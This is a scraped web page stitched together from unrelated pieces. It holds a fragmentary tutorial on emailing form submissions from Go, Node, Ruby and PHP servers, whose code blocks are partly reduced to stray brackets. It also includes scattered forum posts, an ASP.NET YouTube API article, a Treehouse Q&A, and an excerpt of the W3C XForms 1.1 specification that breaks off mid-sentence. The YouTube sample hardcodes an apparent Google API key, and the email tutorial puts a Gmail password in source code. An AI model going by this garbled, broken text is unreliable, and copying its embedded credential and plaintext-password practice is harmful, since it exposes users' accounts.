version attribute value, then the XForms Processor must terminate processing after dispatching the event xforms-version-exception to the default
model.
Note:
Since documents that conform to [XForms 1.0] are required to be XForms schema valid, and XForms 1.1 features including the
version
attribute would violate the XForms 1.0 schema, an XForms 1.0 Processor may not correctly process an XForms 1.1 document. Implementers of XForms 1.0
processors are encouraged to check for the
version in order to more gracefully report potential compatibility issues with XForms 1.1 documents.
Examples:
model, with the XForms namespace defaulted:
<model id="Person" schema="MySchema.xsd"> <instance resource="" /> ... </model>
<model> <message level="modal" ev: ... </model> ... <model id="m2" version="1.1"> ... </model>
Since the
version attribute is not specified on the
model, the XForms Processor may choose any language conformance level, which may be incompatible with the version setting of the second
model. If the chosen level is incompatible with XForms 1.1, the
message action occurs during initialization of the second
model due to its version incompatibility with the default
model.
<model version="1.0 1.1"> ... </model> ... <model id="m2"> ... </model>
Since the
version attribute is not specified on the second
model, it is compatible with any choice made based on the version setting on the default model.
This optional element contains or references initial instance data.
Common Attributes: Common
Special Attributes:
Optional link to externally defined initial instance data. If the link traversal fails, it is treated as an exception (4.5.4 The xforms-link-exception Event).
Optional link to externally defined initial instance data. If the link is traversed and the traversal fails, it is treated as an exception (4.5.4 The xforms-link-exception Event).
If the
src attribute is given, then it takes precedence over inline content and the
resource attribute, and the XML data for the instance is obtained from the link. If the
src attribute is omitted, then the data for the instance is obtained from inline content if it is given or the
resource attribute otherwise.
If both the
resource attribute and inline content are provided, the inline content takes precedence as described at 4.2.1 The xforms-model-construct Event. The host language may also specify an external link for the instance data using a linking attribute. The content obtained from a linking attribute may override the inline content, just the
resource attribute, or neither. The host language may treat failure to traverse the link as an exception (4.5.4 The xforms-link-exception Event). If construction of the XPath data model for the instance data fails due to an XML error, then processing halts after dispatching an xforms-link-exception
with a
resource-uri indicating either the URI for an external instance, a barename fragment identifier URI reference (including the leading # mark) for an identified internal instance, or empty string for an unidentified internal instance.
This exception could happen, for example, if the content had no top-level element or more than one top-level element, neither of which is permitted by the grammar of XML.
Note:
All data relevant to the XPath data model must be preserved during processing and as input to submission serialization, including processing instructions, comment nodes and all whitespace.
Note:
XForms authors who need additional control over the serialization of namespace nodes can use the
includenamespaceprefixes attribute on the
submission element.
Details about the
submission element and its processing are described in 11 The XForms Submission Module.
Element
bind selects a node-set (Optional)
Special Attributes:
An optional attribute containing a model binding expression that selects the set of nodes on which this
bind operates.
See 6 Model Item Properties for details on model item properties.
See 7.2 Evaluation Context for details on how the evaluation context is determined for each attribute of the
bind element.
All XML Schemas are loaded. If an error occurs while attempting to access or process a remote document, processing halts with an exception (4.5.4 The xforms-link-exception Event).
For each
instance element, if inline initial instance data is given, then
an XPath data model [7 XPath Expressions in XForms] is constructed from it as described in Section 3.3.2 The instance Element.
; otherwise, if the
resource attribute provides
an external source for the initial instance, that is used instead to obtain the XPath data model. If the external initial
instance data is not well-formed XML or cannot be retrieved, processing halts with an exception (4.5.4 The xforms-link-exception Event).
If there are no
instance elements, the data model is not constructed in this phase, but during user interface construction
(4.2.2 The xforms-model-construct-done Event).
If applicable, P3P initialization occurs. [P3P 1.0]
Perform the behaviors of
xforms-rebuild,
xforms-recalculate, and
xforms-revalidate in sequence
on this
model element
without dispatching events to invoke the behaviors.
The notification event markings for these operations are discarded, and the
xforms-refresh behavior is not performed at this stage. For each form control, the single node binding expression is evaluated, if it exists on the form control, to ensure that it points to a node that exists. If this is not the case then the form control should behave in the same manner as if it had bound to a model item with the
relevant model item property resolved to
false.
Otherwise, the user interface for the form control is created and initialized.
The above steps comprise the default processing of
xforms-model-construct-done.
After all form controls have been initialized and all
xforms-model-construct-done events have been processed, the xforms-ready event is dispatched to each model.
Dispatched in response to: a request to rebuild the internal data structures that track computational dependencies within a particular XForms Model.
Target:
model
Bubbles: Yes
Cancelable: Yes
Context Info: None
The default action for this event results in the following:
All model item pro | http://www.w3.org/TR/xforms11/index-diff.html | crawl-001 | refinedweb | 5,436 | 52.46 |
I have a site with about 150K pages in its sitemap. I'm using the sitemap index generator to make the sitemaps, but really, I need a way of caching it, because building the 150 sitemaps of 1,000 links each is brutal on my server.[1]
I COULD cache each of these sitemap pages with memcached, which is what I'm using elsewhere on the site...however, this is so many sitemaps that it would completely fill memcached....so that doesn't work.
What I think I need is a way to use the database as the cache for these, and to only generate them when there are changes to them (which as a result of the sitemap index means only changing the latest couple of sitemap pages, since the rest are always the same.)[2] But, as near as I can tell, I can only use one cache backend with django.
How can I have these sitemaps ready for when Google comes-a-crawlin' without killing my database or memcached?
Any thoughts?
[1] I've limited it to 1,000 links per sitemap page because generating the max, 50,000 links, just wasn't happening.
[2] for example, if I have sitemap.xml?page=1, page=2...sitemap.xml?page=50, I only really need to change sitemap.xml?page=50 until it is full with 1,000 links, then I can cache it pretty much forever, and focus on page 51 until it's full, cache it forever, etc.
EDIT, 2012-05-12: This has continued to be a problem, and I finally ditched Django's sitemap framework after using it with a file cache for about a year. Instead I'm now using Solr to generate the links I need in a really simple view, and I'm then passing them off to the Django template. This greatly simplified my sitemaps, made them perform just fine, and I'm up to about 2,250,000 links as of now. If you want to do that, just check out the sitemap template - it's all really obvious from there. You can see the code for this here:
I had a similar issue and decided to use django to write the sitemap files to disk in the static media and have the webserver serve them. I made the call to regenerate the sitemap every couple of hours since my content wasn't changing more often than that. But it will depend on your content how often you need to write the files.
I used a django custom command with a cron job, but curl with a cron job is easier.
Here's how I use curl, and I have apache send /sitemap.xml as a static file, not through django:
curl -o /path/sitemap.xml
Okay - I have found some more info on this and what amazon are doing with their 6 million or so URLS.
Amazon simply make a map for each day and add to it:
So this means that they end up with loads of site-maps - but the search bot will only look at the latest ones - as the updated dates are recent. I was under the impression that one should refresh a map - and not include a url more than once. I think this is true. But, Amazon get around this as the site maps are more of a log. A url may appear in a later site-map - as it may be updated - but Google won't look at the older maps as they are out of date - unless of course it does a major re-index. This approach makes a lot of sense as all you do is simply build a new map - say each day of new and updated content and ping it at google - thus google only needs to index these new urls.
This log approach is a cinch to code - as all you need is a static data-store model that stores the XML data for each map. Your cron job can build a map - daily or weekly - and then store the raw XML page in a blob field or what have you. You can then serve the pages straight from a handler, and the index map too.
I'm not sure what others think but this sounds like a very workable approach and a load off ones server - compared to rebuilding huge map just because a few pages may have changed.
I have also considered that it may be possible to then crunch a week's worth of maps into a week map and 4 weeks of maps into a month - so you end up with monthly maps, a map for each week in the current month and then a map for the last 7 days. Assuming that the dates are all maintained, this will reduce the number of maps and tidy up the process - I'm thinking in terms of reducing 365 maps for each day of the year down to 12.
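The log-style approach is easy to sketch without the sitemap framework at all. Here is a plain-Python illustration (the directory path and example.com URLs are placeholders, not anything from the question): write one immutable file per day containing only that day's new/updated URLs, then regenerate just the small index over them.

```python
import os
from datetime import date
from xml.sax.saxutils import escape

SITEMAP_DIR = "/tmp/sitemaps"  # placeholder; serve this directory statically

def write_daily_sitemap(urls, day=None):
    """Write one sitemap file for `day` containing only that day's new/updated URLs."""
    day = day or date.today()
    path = os.path.join(SITEMAP_DIR, "sitemap-%s.xml" % day.isoformat())
    entries = "".join(
        "<url><loc>%s</loc><lastmod>%s</lastmod></url>" % (escape(u), day.isoformat())
        for u in urls
    )
    with open(path, "w") as f:
        f.write('<?xml version="1.0" encoding="UTF-8"?>'
                '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">%s</urlset>' % entries)
    return path

def write_index(base_url="https://example.com/sitemaps/"):
    """Regenerate the index over every daily file; old daily files are never rewritten."""
    names = sorted(n for n in os.listdir(SITEMAP_DIR) if n.startswith("sitemap-"))
    body = "".join("<sitemap><loc>%s%s</loc></sitemap>" % (base_url, n) for n in names)
    with open(os.path.join(SITEMAP_DIR, "sitemap.xml"), "w") as f:
        f.write('<?xml version="1.0" encoding="UTF-8"?>'
                '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">%s</sitemapindex>' % body)

os.makedirs(SITEMAP_DIR, exist_ok=True)
write_daily_sitemap(["https://example.com/page/1", "https://example.com/page/2"])
write_index()
```

A nightly cron job calling these two functions replaces re-rendering all 150 sitemaps on every crawl - only the newest file and the index ever change.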
Here is a pdf on site maps and the approaches used by amazon and CNN.
I'm using django-staticgenerator app for caching sitemap.xml to filesystem and update that file when data updated.
settings.py:
STATIC_GENERATOR_URLS = ( r'^/sitemap', ) WEB_ROOT = os.path.join(SITE_ROOT, 'cache')
models.py:
from staticgenerator import quick_publish, quick_delete from django.dispatch import receiver from django.db.models.signals import post_save, post_delete from django.contrib.sitemaps import ping_google @receiver(post_delete) @receiver(post_save) def delete_cache(sender, **kwargs): # Check if a Page model changed if sender == Page: quick_delete('/sitemap.xml') # You may republish sitemap file now # quick_publish('/', '/sitemap.xml') ping_google()
In nginx configuration I redirect sitemap.xml to cache folder and django instance for fallback:
location /sitemap.xml { root /var/www/django_project/cache; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header Host $http_host; if (-f $request_filename/index.html) { rewrite (.*) $1/index.html break; } # If file doesn't exist redirect to django if (!-f $request_filename) { proxy_pass; break; } }
With this method, sitemap.xml will always be updated and clients(like google) gets xml file always staticly. That's cool I think! :)
For those who (for whatever reason) would prefer to keep their sitemaps dynamically generated (eg freshness, lazyness). Try django-sitemaps. It's a streaming version of the standard sitemaps. Drop-in replacement. Much faster response time and uses waaaaay less memory. | http://m.dlxedu.com/m/askdetail/3/f35fcc112a64341f9bb8f52dae56a682.html | CC-MAIN-2018-22 | refinedweb | 1,055 | 70.53 |
Sam Landfried
In my previous post, we created a simple UI component with Facebook’s React library. Now, we’ll create data flows between multiple components.
Let’s build an app that takes the input from a textfield and displays it as rot13.
We’ll structure the app like so:
And, the components we’ll build are:
It may not be obvious right now, but the container is essential. Every React component must return a single element. In order for us to display both the Input and the Output components, they need to be inside another component.
We’ll start with our boilerplate HTML, making sure to include the libraries for React and for the JSX Transformer. Remember, when you work with JSX, you need to include the
/** @jsx React.DOM */ directive and specify the script’s type as
text/jsx.
For each component, we pass in a “spec” object that has a render function.
<!DOCTYPE html> <html> <head> <script src=""></script> <script src=""></script> </head> <body> <div id="container"></div> <script type="text/jsx"> /** @jsx React.DOM */ var InputComponent = React.createClass({ render: function () { } }); var OutputComponent = React.createClass({ render: function () { } }); var AppComponent = React.createClass({ render: function () { } }); React.renderComponent( <AppComponent />, document.getElementById('container') ); </script> </body> </html>
Next, we need the render function of our components to return values.
var InputComponent = React.createClass({ render: function () { return ( <input></input> ); } }); var OutputComponent = React.createClass({ render: function () { return ( <div></div> ); } }); var AppComponent = React.createClass({ render: function () { return ( <div> <InputComponent /> <OutputComponent /> </div> ); } }); React.renderComponent( <AppComponent />, document.getElementById('container') );
Notice that the
AppComponent returns a
<div> with the
InputComponent and
OutputComponents nested inside of them. When the
AppComponent’s
render function is called, the
render functions of the
InputComponent and
OutputComponent are called as well. This produces a DOM tree roughly equivalent to:
<div> <input /> <div></div> </div>
We need a way to get data from one component to another. React has a simple, but sophisticated, system for moving data around. Here is how we might get the static text “Ni hao, React” from our
AppComponent to our
OutputComponent:
var InputComponent = React.createClass({ render: function () { return ( <input></input> ); } }); var OutputComponent = React.createClass({ render: function () { return ( <div>{ this.props.value }</div> ); } }); var AppComponent = React.createClass({ render: function () { return ( <div> <InputComponent /> <OutputComponent value="I know kung fu" /> </div> ); } }); React.renderComponent( <AppComponent />, document.getElementById('container') );
Our
AppComponent provides a
value attribute to the
OutputComponent. Then, the
OutputComponent accesses this attribute as a property of
this.props.
This is an example of React’s one-way data flow. Every component has access to a
props object, and those properties are added to this
props object by the parent component. The property names can be any valid JavaScript variable name, and the value can be any valid JavaScript value or expression.
Here, we named the property “value,” but it could have easily been “stringToDisplay” or “outputText.”
To access the value in the
OutputComponent’s JSX, you wrap it in single curly braces. This tells the JSX Transformer to evaluate whatever JavaScript expression is inside those curly braces.
The values passed from a parent component to a child component do not have to be static. The first step is the let the
AppComponent maintain its own store of dynamic data. A
state variable, like the
props variable, is available to every component. But
state is the data that is owned by a component, as opposed to being provided by a parent component.
Let’s update the code so that the
AppComponent sets up an initial
state object for holding data, and passes some of that data to the
OutputComponent.
var AppComponent = React.createClass({ getInitialState: function () { return { value: "I know kung fu!!!!", } }, render: function () { return ( <div> <InputComponent /> <OutputComponent value={ this.state.value } /> </div> ); } }); React.renderComponent( <AppComponent />, document.getElementById('container') );
This code has the equivalent outcome as the previous version, but reveals a little bit more about how to use React effectively. The
getInitialState function is called automatically and sets up the
state object for a component. We can return any object, and are specifying an object literal for the sake of simplicity.
To pass some of our
AppComponent’s state data to the
OutputComponent, we use attributes, as we did before. But this time, instead of a static string value, we use the expression
this.state.value, wrapped in single curly braces.
Note that we do not wrap
{ this.state.value } in quotes. If we did that, it would be passing a string, and not the actual JavaScript value we intended.
It’s time to complete our data flow by connecting our
InputComponent’s input element to our
AppContainer’s state. First, we will watch for the
change event on the input.
var InputComponent = React.createClass({ _changeHandler: function (event) { console.log(event.target.value); }, render: function () { return ( <input onChange={ this._changeHandler } ></input> ); } });
Again, we make use of attributes to declare how our components should interact. Technically, the
<input> element is a React component, and we are specifying its
onChange attribute. We pass it
this._changeHanlder as the value, and we declare a
_changeHandler property as part of our component’s spec.
onChange is an attribute that is baked into React. You can find a list of supported event attribute names in the Event System documentation on the React site.
Alternatively,
_changeHandler is a name that we made up arbitrarily. One convention that is popular in the React community is to prefix your custom functions with an underscore. This is a good way to communicate that this is a function that you have declared, and is not one of React’s built in component functions.
We define
_changeHandler just like any other DOM event handler callback; it should accept a parameter for the event object. Currently, it is only logging the value of the input. To make it do something more interesting, we’ll need to make a couple of changes to the
AppComponent.
We will update
AppComponent by adding a function that updates its state, and we will pass a reference to this function to
InputComponent.
var AppComponent = React.createClass({ getInitialState: function () { return { value: "I know kung fu!!!!", } }, _updateValue: function (newValue) { this.setState({ value: newValue }); }, render: function () { return ( <div> <InputComponent sendChange={ this._updateValue }/> <OutputComponent value={ this.state.value} /> </div> ); } });
We have created an
_updateValue function that calls the built in
setState component function. It accepts an object whose properties will overwrite the existing state. When you call
setState, you only have to specify the ones you want to update, even if your component’s state has many other properties.
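Conceptually, setState does a shallow merge into the existing state. In plain JavaScript terms (a sketch of the merge behavior only, not React's actual implementation):

```javascript
// A sketch of setState's shallow-merge behavior (not React's real code).
var state = { value: "I know kung fu!!!!", theme: "dark" };

function setState(partial) {
  // Only the keys present in `partial` are overwritten;
  // every other property of `state` is left untouched.
  Object.assign(state, partial);
}

setState({ value: "rot13 me" });
console.log(state.value); // "rot13 me"
console.log(state.theme); // "dark" — untouched
```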
We declare an attribute for
InputComponent named
sendChange and give it a reference to
_updateValue.
InputComponent now has access to this function reference in its
props object. Let’s use that to complete the data flow.
var InputComponent = React.createClass({ _changeHandler: function (event) { this.props.sendChange(event.target.value); }, render: function () { return ( <input onChange={ this._changeHandler } ></input> ); } });
Now, when you type into the input field, output updates immediately. Right now, it’s in plain text. Let’s fix that.
We need to add our rot13 function to the
OutputComponent and call it in our
render function.
var OutputComponent = React.createClass({ _rot13: function (s) { return s.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);}); }, render: function () { return ( <div>{ this._rot13(this.props.value) }</div> ); } });
Now, our output, though not anywhere near NSA-proof, is unreadable by normal humans. Hooray!
React Components act as neat little boxes that take some input and produce a piece of your UI. Each one has limited responsibilty, which makes it easier for you to reason about your app. While building this app, you learned how to pass data and function references using
props and
state. Then you made these data flows reactive via Event attributes. Next time, we’ll work on an even larger application and examine the benefits of React over other frameworks. | https://www.bignerdranch.com/blog/how-to-use-facebooks-react-library-to-build-UIs-part-2/ | CC-MAIN-2018-51 | refinedweb | 1,317 | 51.24 |
I can't figure out the answer to this homework problem:
Write a static method named countEmptyBowls, to be added to the Bowl class, which is passed an array of Bowl objects, and returns the (int) number of Bowl objects in the array that are empty.
Bowl Class:
public class Bowl { private double weight; private boolean empty; private String origin; // country of manufacture public Bowl(double w, boolean e, String origin) { weight = w; empty = e; this.origin = origin; } public double getWeight() { return weight; } public boolean getEmpty() { return empty; } public String getOrigin() { return origin; } public void setEmpty(boolean emptyStatus) { empty = emptyStatus; } public String toString() { return ("from " + origin + " weight: " + weight); } }
This is my most recent try for the method:
public int countEmptyBowls(int[] Bowl){ int count = 0; for(k = 0;k<Bowl.length;k++){ if(k.getEmpty()== true) count++; return count;}
This didn't work. Ive tried a few other things but they didn't work either :'(
Thanks for helping! | http://www.javaprogrammingforums.com/whats-wrong-my-code/26314-simple-array-problem.html | CC-MAIN-2015-48 | refinedweb | 158 | 50.7 |
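For reference, one working approach: the parameter must be a Bowl[] (not int[]), the method must be static, the loop variable needs a declared type, and the return belongs after the loop rather than inside it. Shown here with a trimmed-down Bowl class for illustration:

```java
// Trimmed-down Bowl with only what countEmptyBowls needs.
class Bowl {
    private boolean empty;

    Bowl(boolean e) { empty = e; }

    public boolean getEmpty() { return empty; }

    // Static method: takes an array of Bowl objects, returns how many are empty.
    public static int countEmptyBowls(Bowl[] bowls) {
        int count = 0;
        for (int k = 0; k < bowls.length; k++) {
            if (bowls[k].getEmpty()) {
                count++;
            }
        }
        return count; // return AFTER the loop, not inside it
    }
}

public class Main {
    public static void main(String[] args) {
        Bowl[] bowls = { new Bowl(true), new Bowl(false), new Bowl(true) };
        System.out.println(Bowl.countEmptyBowls(bowls)); // prints 2
    }
}
```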
Learn to Use ITensor
Index Objects
The most basic element of ITensor is not actually a tensor: it is a tensor index,
an object of type
Index. (By tensor index we mean i, j, or k in an expression
like @@T_{ijk}@@.)
ITensors are "intelligent tensors" because they "know" what indices they have. This is possible since an Index carries extra information beyond its size.
The simplest way to construct an Index is to give its name and size:
auto i = Index("index i",3);
Upon creation, an Index gets "stamped" with a permanent, hidden id number that allows copies of the Index to recognize each other. Typically you do not need to look at these id numbers; it is enough to know that indices match (compare equal) if they are copies of the same original index:
auto j = i; //make a copy of i Print(j==i); //prints: j==i = true
(also they must have the same "prime level"; see next section).
Neither the name nor size are used to compare indices, because two different indices could accidentally have the same name and size.
To access the size of an Index, use its
.m() method
println("The size of ",i.name()," is ",i.m()); //prints: The size of index i is 3
The convention of calling the size "m" comes from the DMRG literature.
#include "itensor/all_basic.h" using namespace itensor; int main() { auto i = Index("index i",3); println("The size of ",i.name()," is ",i.m()); return 0; }
After creating an Index, most of its properties are permanently fixed, including its size. The philosophy of ITensor is that indices have a meaning given at the time they are created. A new Index can be created to take the place of an old one, but the semantic meaning of a given Index object cannot be changed.
Priming Indices
There is one property of an Index you can change: its prime level.
An Index starts out with prime level zero. Copies of the same original Index must have the same prime level to compare equal.
Calling
prime(i) will produce a copy of i with prime level raised by 1.
Because this copy has a different prime level, it will no longer compare equal to i.
auto i1 = prime(i); println("The prime level of i1 is ",i1.primeLevel()); //prints: The prime level of i1 is 1 printfln("i1==i is %s",i1==i); //prints: i1==i is false
There are many convenient ways to manipulate Index prime levels.
The
prime function accepts an optional increment amount:
auto i3 = prime(i,3); println(i3.primeLevel()); //prints: 3
Calling
noprime resets the prime level to zero.
auto i0 = noprime(i3); println(i0.primeLevel()); //prints: 0
Note that the above names (
i3,
i0, etc.) are just
for pedagogical reasons—you can use any variable names
you want regardless of the prime level.
We will see more ways to manipulate primes as we work with ITensors with multiple indices.
Printing Indices
Printing an Index shows useful information about it:
auto i = Index("index i",3,Link); println(i); //prints: ("index i",3,Link|587)
The output shows the name, size, and IndexType of i. The last number is part of the id number of the Index. Id numbers are random 64 bit integers and vary each time you run your program.
The prime level is displayed at the end:
println(prime(i,2)); //prints: ("index i",3,Link|587)'' println(prime(i,10)); //prints: ("index i",3,Link|587)'10
Index Types
The Index constructor accepts an optional
IndexType argument:
auto s2 = Index("site 2",2,Site); //IndexType set to Site
IndexTypes are useful because they allow you to manipulate or retrieve indices of a certain type. IndexTypes can be thought of as labels that distinguish broad categories of indices, such as "physical" versus "virtual" indices.
In addition to the IndexTypes pre-defined by ITensor, you can define a custom IndexType
auto MyType = IndexType("MyType");
and use it to create indices of this type
auto m1 = Index("m1",5,MyType); auto m2 = Index("m2",7,MyType);
Internally, IndexType data is just a fixed-size, constant string, and can be up to 7 characters long.
The IndexType of an Index can be obtained by calling the
.type() method.
println("The type of m1 is ",m1.type()); //prints: The type of m1 is MyType
For a complete listing of all of the methods of class Index, view the detailed documentation.
Gaining Lateral Movement with SSH Password Sniffing
Sometimes the best way to gain lateral movement during a penetration test is to steal a password. Here’s how to sniff passwords from a running SSH server.
If you’ve managed to gain a remote shell onto a Linux server and elevated your privileges to root (congrats!), the next step is to maintain your access and gain lateral movement around the network. If you’ve been unable to find anything on the compromised server that would indicate a password for any system, including the compromised server, you can always try to sniff SSH passwords straight out of OpenSSH. You can even be doing this while attacking password hashes offline. I always prefer multiple options that race each other to the correct answer.
The Reality of SSH Passwords
Lateral movement through OpenSSH password sniffing is a very viable concept because:
- People use the same username and password combinations on multiple systems
- Passwords often follow a common pattern which can be used to predict other passwords on the estate
- People type valid passwords into the wrong servers.
- Given enough time, someone will always login
There are exceptions to the above but unfortunately, most organisations are not that mature.
3 Ways to Sniff SSH Passwords on a Compromised Server
1. Replace OpenSSH with a Dedicated Honeypot Application
The easiest way to sniff SSH passwords is to replace the OpenSSH application with a honeypot. Which honeypot you choose will depend on what you’re trying to achieve. To help you decide, these are the three different categories of SSH honeypots.
- Low Interaction. A low interaction SSH honeypot will present a user with a login prompt when connecting, may allow a user to ‘log in’ with any username and password, and will allow users to type commands into a terminal session that don’t actually do anything but log. Limited or no feedback is given. After a few seconds of using one of these, it is obvious that you’re not actually using a real shell.
- Medium Interaction. A medium interaction SSH honeypot will allow a user to ‘log in’ and use a limited set of commands. Executing these commands will change the imagined state inside the rest of the ‘server’. All other commands will do nothing but log.
- High Interaction. These are very complex honeypots that behave just like the real thing. In reality, this is usually just an intercepting proxy to a real SSH daemon on the server. It will use the host's certificates and signatures and log and relay any keystrokes given. The aim is that the server can be restored whenever required.
There are a lot of SSH honeypots available. Some examples you could use are:
- Kippo — medium interaction, inspired by Kojoney2
- Cowrie — medium interaction in normal mode, high interaction when proxying to a real OpenSSH port
- Kojoney2 — medium interaction
- SSH Honeypot — low interaction
- Dockpot — medium interaction
- HonSSH — high interaction as a proxy to a real OpenSSH port
- sshesame — low interaction
- sshipot — high interaction as a proxy to a real OpenSSH port
Choosing and Implementing a Honeypot
Stealth is really important. If the owners of the system detect your presence they’re going to shut you off very quickly. For this reason, replacing OpenSSH with a low or medium interaction honeypot isn’t going to work very well. A better option is to:
- Move OpenSSH from the existing port (usually 22) to another unused port (such as 2222)
- Configure OpenSSH to listen only on the loopback network interface (127.0.0.1 or localhost) so that it can’t be discovered remotely.
- Install your high interaction honeypot (intercepting proxy) onto port 22 and proxy traffic to the original OpenSSH now on 127.0.0.1:2222
- Configure your honeypot to present the original certificates used by OpenSSH to ensure that the server signature stays the same
With a high interaction/proxy honeypot, you’ll be able to capture all usernames, passwords, and commands used by the systems administrators over an extended period of time. Or at least until they spot the compromise. Anytime anyone logs in or executes are remote script, everything they type or send will be logged into the honeypot logs. Make sure the logs are hard to detect, don’t get too big, and are regularly shipped offsite and truncated.
The benefit of this method is that anything the user does after logging in is also logged. This means we get to see any other passwords they enter, commands they run, servers they talk to, and the context within which they’re working. Even if their shell doesn’t log to a .bash_history file, we still get the history of what they’ve done.
2. Extend OpenSSH with a PAM module
If you’re unable to move OpenSSH to another port and install an intercepting proxy honeypot, you can instead extend OpenSSH with a custom PAM module. The basic steps required are:
- Install the prerequisite packages
- Install the custom PAM module
- Restart sshd to pick up the new module
On an ubuntu based system the PAM Python prerequisites can be installed with:
apt-get install python libpam-python
I’ve updated a PAM module I found at the defunct chokepoint.net (via web.archive.org). The module now logs all usernames and passwords, regardless of whether or not the username or password was valid. The output is written to a custom file instead of using Syslog as we don’t want to log to the local auth.log file and any connected SIEM tools. That would be a bit obvious.
import crypt, spwd,def auth_log(msg):
f=open("/tmp/auth","a+")
f.write(msg)
f.close()def check_pw(user, password):
"""Check the password matches local unix password on file"""
hashed_pw = spwd.getspnam(user)[1]
return crypt.crypt(password, hashed_pw) == hashed_pwdef pam_sm_authenticate(pamh, flags, argv):
try:
user = pamh.get_user()
except pamh.exception, e:
return e.pam_result
if not user:
auth_log("Remote Host: {} ({}:Error-UnknownUser)".format(pamh.rhost, user))
return pamh.PAM_USER_UNKNOWN
try:
resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, 'Password:'))
except pamh.exception, e:
return e.pam_resultauth_log("Remote Host: {} ({}:{})".format(pamh.rhost, user, resp.resp))
if not check_pw(user, resp.resp):
return pamh.PAM_AUTH_ERR
return pamh.PAM_SUCCESSdef pam_sm_setcred(pamh, flags, argv):
return pamh.PAM_SUCCESSdef pam_sm_acct_mgmt(pamh, flags, argv):
return pamh.PAM_SUCCESSdef pam_sm_open_session(pamh, flags, argv):
return pamh.PAM_SUCCESSdef pam_sm_close_session(pamh, flags, argv):
return pamh.PAM_SUCCESSdef pam_sm_chauthtok(pamh, flags, argv):
return pamh.PAM_SUCCESS
craighays/pam-python-common-auth
Contribute to craighays/pam-python-common-auth development by creating an account on GitHub.
github.com
To install this module, save it to a file in /lib/security/ such as /lib/security/common-auth.py and update the file /etc/pam.d/sshd to comment out the @include common-auth line and add our new script instead:
#@include common-auth
auth requisite pam_python.so common-auth.py
Restart sshd and you should start to see login attempts, both failed and successful, appearing in your custom output file /tmp/auth. Don’t forget to check the true /var/log/auth.log file for any errors which would give away what you’re doing. If anything appears, get them fixed before moving on.
3. Patch the Compiled OpenSSH Binary to Capture Passwords
Instead of proxying traffic to OpenSSH or extending it with a custom PAM module, you can simply replace the /usr/sbin/sshd binary with a modified version that writes passwords out to a predefined location. The process for this would be:
- Identify the version of sshd installed and running on the server
- Download the source code for that version of sshd (offline)
- Patch the source code to write the output to file of your choice (offline)
- Compile sshd (offline)
- Copy the modified sshd binary to the compromised server and replace the existing binary with the new one. You’ll need to backup the existing binary so that you can restore it after the engagement ends.
You can find the version of sshd that is running by simply executing the command:
/usr/sbin/sshd -v
This will generate a usage error but it contains the version number which is what we’re looking for!
The source code for each release of OpenSSH can be found in the branches section of the official OpenSSH GitHub repository. Clone it to your local machine and apply the patch to auth-passwd.c you can find in Brad Tilley’s sshlog and then compile as normal. The output will include an sshd binary we can upload back to the compromised server, hot-swap with the existing binary, and then restart the service.
Once SSH is listening with the new binary, usernames and passwords should be logged in your custom log file.
How to Protect Against SSH Password Sniffing
If you’re still using SSH passwords you’re at risk. Key-based authentication is the way to go. Even if a single session authentication is sniffed, you can’t capture the key that generated the authentication response, only the response itself. The user’s private key remains protected.
Originally published at on February 19, 2020. | https://craighays.medium.com/gaining-lateral-movement-with-ssh-password-sniffing-e72fea5f8734 | CC-MAIN-2021-10 | refinedweb | 1,516 | 55.24 |
Components and supplies
Apps and online services
About this project
Paul DeCarlo has a great article on sending weather data from a Particle Photon to Microsoft Azure. I wanted to duplicate this with the new Arduino MKR1000.
The Photon uses a webhook to send data from the Particle cloud to Azure. Since the MKR1000 supports HTTPS, data can be sent directly to Azure. This guide will get your MKR1000 connected to Azure and reuse a lot of the server side code from the Microsoft Connect the Dots project.
Hardware
A DHT22 sensor is used to measure temperature and humidity. You could also modify the code to support the DHT11 sensor. Wire the DHT sensor on the breadboard. Send 3.3 volts from the MKR1000 to the first pin. Place a 10,000Ω pullup resistor from 3.3V to pin 2. Connect pin 3 to ground. Run a wire from pin 2 on the DHT22 to pin 6 on the MKR1000.
For more info on DHT22, see Adafruit's DHT tutorial.
Arduino IDE
Open the Arduino IDE. Use the Boards Manager to install the MKR1000 board. Use the Library Manager to install the WiFi101 library.
HTTPS
The Arduino MKR1000 supports HTTPS, but we need to manually install the certificates for the sites we will visit. This is necessary since the memory on the device is limited. This is a two step process. First we load a sketch on the board and then run a program on our computer to upload the certificates.
Use the Arduino IDE to load the Firmware Updater Sketch onto your board.
Examples -> WiFi101 -> Firmware Updater
Download the WiFi101 Firmware Updater. Unzip the archive and run winc1500-uploader-gui.exe.
The HTTPS certificate for Azure Event hubs is issued to servicebus.windows.net so any service bus URL should work. Enter ctd-ns.servicebus.windows.net in the text field. Choose your COM port and upload the certificates.
Arduino Sketch
Clone or download the Arudino sketch from. Edit the ssid tab and change the
ssid[] and
password[] to match your network settings. Upload the sketch to your MKR1000 board.
If you get errors, you might need to use the Arduino Library Manger (Sketch -> Include Library -> Manage Libraries...) to install the "DHT sensor library", ArduinoJson, or RTCZero library.
Open the Arduino Serial Monitor (Tools -> Serial Monitor) and ensure that data is begin sent to Azure.
The sketch reuses an Event hub from the connect the dots project. This means that we can use the existing Azure web app to view our data. Open in your browser. You should see data from MKR1000. Since this is a "public" event hub, your sensor data will be mixed with other sensors. If multiple people are running this MKR1000 code, you might want to change the
displayname or
guid in the
createJSON function.
Creating your own Event Hub
Running against the existing Event hub is OK, but you can also create your own event hub for your data. This requires Visual Studio and an Azure subscription. The Free Visual Studio 2015 Community edition works fine. You can also sign up for a free Azure trial subscription.
We'll be using code from the Connect the Dots project. Clone project with git or use the Download ZIP button on the Github page.
git clone
You can follow Microsoft's instructions to for creating the Azure resources which takes a while but gives you a deep understanding of how the pieces are put together. I suggest using the AzurePrep project from the cloned repository to automatically create these resources.
Use Visual Studio and open the AzurePrep Solution from connectthedots\Azure\AzurePrep. Run the AzurePrep project in Release Mode.
The application will open some windows prompting you to log into Azure in and grant permission to your resources. After that, answer a bunch of questions in the terminal to create the resources.
You need to choose a name for resources. The connect the dots documentation recommends the name ctd (connect the dots) + your initials. For example, I chose "ctddc".
Back in Visual Studio, run the CreateWebConfig target from AzurePrep to create a configuration file for the website. Login, follow the prompts. A web.config file will be written to the desktop.
